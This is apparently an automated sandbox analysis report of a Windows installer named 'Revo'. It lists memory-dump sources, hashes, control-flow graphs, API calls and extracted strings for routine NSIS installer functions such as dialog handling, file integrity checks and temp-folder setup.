                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                              • Opcode ID: c678162996fe6daf9e8ab4f1fec6b2103351496eed0ed7f1d1f24d988285780e
                                                                                                                                              • Instruction ID: 35f0ff7019ed0dad564a4e6eb4f1dd92456e0906ec704515d4596d21edce6ab9
                                                                                                                                              • Opcode Fuzzy Hash: c678162996fe6daf9e8ab4f1fec6b2103351496eed0ed7f1d1f24d988285780e
                                                                                                                                              • Instruction Fuzzy Hash: EDD012317551205BC241A73C6D0C89B7E589F1A3317118B37F46BF21E4D7348C628A9D
                                                                                                                                              APIs
                                                                                                                                              • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateInstance
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 542301482-0
                                                                                                                                              • Opcode ID: 123f68ff51714efecf9c4a00c9935eb00e482b4d0787b723755ae9dd217d2255
                                                                                                                                              • Instruction ID: 4ba496994b59718f24d5e00967c7d670fc4db519b0fd96db73d52b6c03ea5324
                                                                                                                                              • Opcode Fuzzy Hash: 123f68ff51714efecf9c4a00c9935eb00e482b4d0787b723755ae9dd217d2255
                                                                                                                                              • Instruction Fuzzy Hash: 5E411775A00209AFCB00DFE4C989AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                              • Opcode ID: ac6a53922a97e284df946da7801549c61c6641663f6eec0e2d2377e42d6a165f
                                                                                                                                              • Instruction ID: efe4a8e86551b5277c252534069081f49e8237aa630b9309e96070f066c2822a
                                                                                                                                              • Opcode Fuzzy Hash: ac6a53922a97e284df946da7801549c61c6641663f6eec0e2d2377e42d6a165f
                                                                                                                                              • Instruction Fuzzy Hash: A8F08271A04105EADB00EBE5D9599AEB378EF14314F20017BE111F31E5D7B88E509B29

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 200 404122-404134 201 40413a-404140 200->201 202 40429b-4042aa 200->202 201->202 203 404146-40414f 201->203 204 4042f9-40430e 202->204 205 4042ac-4042f4 GetDlgItem * 2 call 404621 SetClassLongW call 40140b 202->205 208 404151-40415e SetWindowPos 203->208 209 404164-40416b 203->209 206 404310-404313 204->206 207 40434e-404353 call 40466d 204->207 205->204 212 404315-404320 call 401389 206->212 213 404346-404348 206->213 222 404358-404373 207->222 208->209 215 40416d-404187 ShowWindow 209->215 216 4041af-4041b5 209->216 212->213 238 404322-404341 SendMessageW 212->238 213->207 221 4045ee 213->221 223 404288-404296 call 404688 215->223 224 40418d-4041a0 GetWindowLongW 215->224 218 4041b7-4041c9 DestroyWindow 216->218 219 4041ce-4041d1 216->219 226 4045cb-4045d1 218->226 228 4041d3-4041df SetWindowLongW 219->228 229 4041e4-4041ea 219->229 227 4045f0-4045f7 221->227 232 404375-404377 call 40140b 222->232 233 40437c-404382 222->233 223->227 224->223 234 4041a6-4041a9 ShowWindow 224->234 226->221 241 4045d3-4045d9 226->241 228->227 229->223 237 4041f0-4041ff GetDlgItem 229->237 232->233 235 404388-404393 233->235 236 4045ac-4045c5 DestroyWindow KiUserCallbackDispatcher 233->236 234->216 235->236 243 404399-4043e6 call 4066df call 404621 * 3 GetDlgItem 235->243 236->226 244 404201-404218 SendMessageW IsWindowEnabled 237->244 245 40421e-404221 237->245 238->227 241->221 242 4045db-4045e4 ShowWindow 241->242 242->221 272 4043f0-40442c ShowWindow KiUserCallbackDispatcher call 404643 KiUserCallbackDispatcher 243->272 273 4043e8-4043ed 243->273 244->221 244->245 247 404223-404224 245->247 248 404226-404229 245->248 250 404254-404259 call 4045fa 247->250 251 404237-40423c 248->251 252 40422b-404231 248->252 250->223 255 404272-404282 SendMessageW 251->255 257 40423e-404244 251->257 252->255 256 404233-404235 252->256 255->223 256->250 260 404246-40424c call 40140b 257->260 261 40425b-404264 call 40140b 257->261 268 404252 260->268 261->223 270 404266-404270 261->270 268->250 270->268 276 404431 272->276 277 40442e-40442f 272->277 273->272 278 404433-404461 GetSystemMenu EnableMenuItem SendMessageW 276->278 277->278 279 404463-404474 SendMessageW 278->279 280 404476 278->280 281 40447c-4044bb call 404656 call 404103 call 4066a2 lstrlenW call 4066df SetWindowTextW call 401389 279->281 280->281 281->222 292 4044c1-4044c3 281->292 292->222 293 4044c9-4044cd 292->293 294 4044ec-404500 DestroyWindow 293->294 295 4044cf-4044d5 293->295 294->226 297 404506-404533 CreateDialogParamW 294->297 295->221 296 4044db-4044e1 295->296 296->222 298 4044e7 296->298 297->226 299 404539-404590 call 404621 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 297->299 298->221 299->221 304 404592-4045a5 ShowWindow call 40466d 299->304 306 4045aa 304->306 306->226
                                                                                                                                              APIs
                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040415E
                                                                                                                                              • ShowWindow.USER32(?), ref: 0040417E
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404190
                                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 004041A9
                                                                                                                                              • DestroyWindow.USER32 ref: 004041BD
                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041D6
                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 004041F5
                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404209
                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00404210
                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004042BB
                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 004042C5
                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 004042DF
                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404330
                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 004043D6
                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 004043F7
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404409
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404424
                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040443A
                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00404441
                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404459
                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040446C
                                                                                                                                              • lstrlenW.KERNEL32(00442748,?,00442748,00000000), ref: 00404496
                                                                                                                                              • SetWindowTextW.USER32(?,00442748), ref: 004044AA
                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 004045DE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Item$MessageSendShow$Long$CallbackDispatcherMenuUser$ClassDestroyEnableEnabledSystemTextlstrlen
                                                                                                                                              • String ID: H'D
                                                                                                                                              • API String ID: 3964124867-716976774
                                                                                                                                              • Opcode ID: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
                                                                                                                                              • Instruction ID: 87935a59af8161b0f78328c19d4fe10c51b4425a276279a6d07330ead90e7465
                                                                                                                                              • Opcode Fuzzy Hash: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
                                                                                                                                              • Instruction Fuzzy Hash: C4C1C2B1500604BBCB216F61EE85E2B3BA8FB85745F11097EFB41B11F0DB7998419B2E

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 307 403d74-403d8c call 406a96 310 403da0-403dd7 call 406570 307->310 311 403d8e-403d9e call 4065e9 307->311 316 403dd9-403dea call 406570 310->316 317 403def-403df5 lstrcatW 310->317 320 403dfa-403e23 call 40404a call 406079 311->320 316->317 317->320 325 403eb5-403ebd call 406079 320->325 326 403e29-403e2e 320->326 332 403ecb-403ef0 LoadImageW 325->332 333 403ebf-403ec6 call 4066df 325->333 326->325 327 403e34-403e5c call 406570 326->327 327->325 334 403e5e-403e62 327->334 336 403f71-403f79 call 40140b 332->336 337 403ef2-403f22 RegisterClassW 332->337 333->332 338 403e74-403e80 lstrlenW 334->338 339 403e64-403e71 call 405f9e 334->339 348 403f83-403f8e call 40404a 336->348 349 403f7b-403f7e 336->349 340 404040 337->340 341 403f28-403f6c SystemParametersInfoW CreateWindowExW 337->341 345 403e82-403e90 lstrcmpiW 338->345 346 403ea8-403eb0 call 405f71 call 4066a2 338->346 339->338 344 404042-404049 340->344 341->336 345->346 352 403e92-403e9c GetFileAttributesW 345->352 346->325 360 403f94-403fae ShowWindow call 406a26 348->360 361 404017-404018 call 4057fa 348->361 349->344 355 403ea2-403ea3 call 405fbd 352->355 356 403e9e-403ea0 352->356 355->346 356->346 356->355 368 403fb0-403fb5 call 406a26 360->368 369 403fba-403fcc GetClassInfoW 360->369 364 40401d-40401f 361->364 366 404021-404027 364->366 367 404039-40403b call 40140b 364->367 366->349 370 40402d-404034 call 40140b 366->370 367->340 368->369 373 403fe4-404007 DialogBoxParamW call 40140b 369->373 374 403fce-403fde GetClassInfoW RegisterClassW 369->374 370->349 378 40400c-404015 call 403cc4 373->378 374->373 378->344
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406A96: GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                                                                                                                • Part of subcall function 00406A96: GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                                                                                                              • lstrcatW.KERNEL32(004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,76F93420,004D1000,00000000,004BD000,00008001), ref: 00403DF5
                                                                                                                                              • lstrlenW.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000,00000002,76F93420), ref: 00403E75
                                                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,004C1000,004CD000,00442748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00442748,00000000), ref: 00403E88
                                                                                                                                              • GetFileAttributesW.KERNEL32(Remove folder: ), ref: 00403E93
                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C1000), ref: 00403EDC
                                                                                                                                                • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                                                                                                              • RegisterClassW.USER32(00464200), ref: 00403F19
                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F31
                                                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F66
                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403F9C
                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00464200), ref: 00403FC8
                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00464200), ref: 00403FD5
                                                                                                                                              • RegisterClassW.USER32(00464200), ref: 00403FDE
                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00404122,00000000), ref: 00403FFD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$H'D$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                              • API String ID: 1975747703-2601196950
                                                                                                                                              • Opcode ID: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
                                                                                                                                              • Instruction ID: 15514f3cea8a7976e0aa4835bc9f56462f0e59a4e5397df6ef3051f83c2bc2bc
                                                                                                                                              • Opcode Fuzzy Hash: 3d59189b7d584aebec317020681a23c8595c56b901d309db355d32037134d7fc
                                                                                                                                              • Instruction Fuzzy Hash: 3C61E770640301BED720AF669D95F273AACEB85B49F10457FF941B22E2DB7D58018A2E

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 484 4030f5-403143 GetTickCount GetModuleFileNameW call 406192 487 403145-40314a 484->487 488 40314f-40317d call 4066a2 call 405fbd call 4066a2 GetFileSize 484->488 489 40338f-403393 487->489 496 403183 488->496 497 403268-403276 call 403053 488->497 498 403188-40319f 496->498 504 403347-40334c 497->504 505 40327c-40327f 497->505 500 4031a1 498->500 501 4031a3-4031ac call 403607 498->501 500->501 510 4031b2-4031b9 501->510 511 403303-40330b call 403053 501->511 504->489 506 403281-403299 call 40361d call 403607 505->506 507 4032ab-4032f7 GlobalAlloc call 406bf1 call 4061c1 CreateFileW 505->507 506->504 530 40329f-4032a5 506->530 535 4032f9-4032fe 507->535 536 40330d-40333d call 40361d call 403396 507->536 514 403235-403239 510->514 515 4031bb-4031cf call 40614d 510->515 511->504 519 403243-403249 514->519 520 40323b-403242 call 403053 514->520 515->519 533 4031d1-4031d8 515->533 526 403258-403260 519->526 527 40324b-403255 call 406b83 519->527 520->519 526->498 534 403266 526->534 527->526 530->504 530->507 533->519 539 4031da-4031e1 533->539 534->497 535->489 544 403342-403345 536->544 539->519 541 4031e3-4031ea 539->541 541->519 543 4031ec-4031f3 541->543 543->519 545 4031f5-403215 543->545 544->504 546 40334e-40335f 544->546 545->504 547 40321b-40321f 545->547 548 403361 546->548 549 403367-40336c 546->549 550 403221-403225 547->550 551 403227-40322f 547->551 548->549 553 40336d-403373 549->553 550->534 550->551 551->519 552 403231-403233 551->552 552->519 553->553 554 403375-40338d call 40614d 553->554 554->489
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403109
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004D9000,00002000), ref: 00403125
                                                                                                                                                • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
                                                                                                                                                • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004DD000,00000000,004C9000,004C9000,004D9000,004D9000,80000000,00000003), ref: 0040316E
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00008001), ref: 004032B0
                                                                                                                                              Strings
                                                                                                                                              • Inst, xrefs: 004031DA
                                                                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032F9
                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403347
                                                                                                                                              • soft, xrefs: 004031E3
                                                                                                                                              • hA, xrefs: 004032B6
                                                                                                                                              • Error launching installer, xrefs: 00403145
                                                                                                                                              • Null, xrefs: 004031EC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$hA$soft
                                                                                                                                              • API String ID: 2803837635-3376623841
                                                                                                                                              • Opcode ID: 7dbbcf09529f8eb162c35c87980925caa7ffea24ff0345c9a2ccdde980ec1a20
                                                                                                                                              • Instruction ID: ad1f7a9ef70f4aee06910e8501363caf5be3f78a24e024e3506d72c770e38dd5
                                                                                                                                              • Opcode Fuzzy Hash: 7dbbcf09529f8eb162c35c87980925caa7ffea24ff0345c9a2ccdde980ec1a20
                                                                                                                                              • Instruction Fuzzy Hash: 0271A071D00204ABDB209FA4DD85B6E7AACEB05716F10417FE911B72D1DB789F408B6D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 557 4066df-4066e8 558 4066ea-4066f9 557->558 559 4066fb-406715 557->559 558->559 560 406925-40692b 559->560 561 40671b-406727 559->561 562 406931-40693e 560->562 563 406739-406746 560->563 561->560 564 40672d-406734 561->564 565 406940-406945 call 4066a2 562->565 566 40694a-40694d 562->566 563->562 567 40674c-406755 563->567 564->560 565->566 569 406912 567->569 570 40675b-40679e 567->570 573 406920-406923 569->573 574 406914-40691e 569->574 571 4067a4-4067b0 570->571 572 4068b6-4068ba 570->572 575 4067b2 571->575 576 4067ba-4067bc 571->576 577 4068bc-4068c3 572->577 578 4068ee-4068f2 572->578 573->560 574->560 575->576 581 4067f6-4067f9 576->581 582 4067be-4067dc call 406570 576->582 579 4068d3-4068df call 4066a2 577->579 580 4068c5-4068d1 call 4065e9 577->580 583 406902-406910 lstrlenW 578->583 584 4068f4-4068fd call 4066df 578->584 593 4068e4-4068ea 579->593 580->593 588 4067fb-406807 GetSystemDirectoryW 581->588 589 40680c-40680f 581->589 592 4067e1-4067e4 582->592 583->560 584->583 594 406899-40689c 588->594 595 406821-406825 589->595 596 406811-40681d GetWindowsDirectoryW 589->596 597 4067ea-4067f1 call 4066df 592->597 598 40689e-4068a1 592->598 593->583 599 4068ec 593->599 594->598 600 4068ae-4068b4 call 406950 594->600 595->594 601 406827-406845 595->601 596->595 597->594 598->600 603 4068a3-4068a9 lstrcatW 598->603 599->600 600->583 605 406847-40684d 601->605 606 406859-406871 call 406a96 601->606 603->600 610 406855-406857 605->610 614 406873-406886 SHGetPathFromIDListW CoTaskMemFree 606->614 615 406888-406891 606->615 610->606 612 406893-406897 610->612 612->594 614->612 614->615 615->601 615->612
                                                                                                                                              APIs
                                                                                                                                              • GetSystemDirectoryW.KERNEL32(Remove folder: ,00002000), ref: 00406801
                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(Remove folder: ,00002000,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,?,?,00000000,00000000,00000000,00000000), ref: 00406817
                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,Remove folder: ), ref: 00406875
                                                                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040687E
                                                                                                                                              • lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,?,?,00000000,00000000,00000000,00000000), ref: 004068A9
                                                                                                                                              • lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,?,?,00000000,00000000,00000000,00000000), ref: 00406903
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                              • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                              • API String ID: 4024019347-2996105050
                                                                                                                                              • Opcode ID: 9e3b55293402a094a689701159d9a6112b8f3c4007e64e8ac0521a09e1289eeb
                                                                                                                                              • Instruction ID: 81e951f8fe173c1ecdb7e664093ca8164433b695446651b9203bd6f4f8051ee3
                                                                                                                                              • Opcode Fuzzy Hash: 9e3b55293402a094a689701159d9a6112b8f3c4007e64e8ac0521a09e1289eeb
                                                                                                                                              • Instruction Fuzzy Hash: 5B6145B2A053019BEB20AF65DC8472B77D4AF45314F25453FF583B22D0EA7C8960876E

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 680 405727-40573c 681 405742-405753 680->681 682 4057f3-4057f7 680->682 683 405755-405759 call 4066df 681->683 684 40575e-40576a lstrlenW 681->684 683->684 685 405787-40578b 684->685 686 40576c-40577c lstrlenW 684->686 689 40579a-40579e 685->689 690 40578d-405794 SetWindowTextW 685->690 686->682 688 40577e-405782 lstrcatW 686->688 688->685 691 4057a0-4057e2 SendMessageW * 3 689->691 692 4057e4-4057e6 689->692 690->689 691->692 692->682 693 4057e8-4057eb 692->693 693->682
                                                                                                                                              APIs
                                                                                                                                              • lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                              • lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
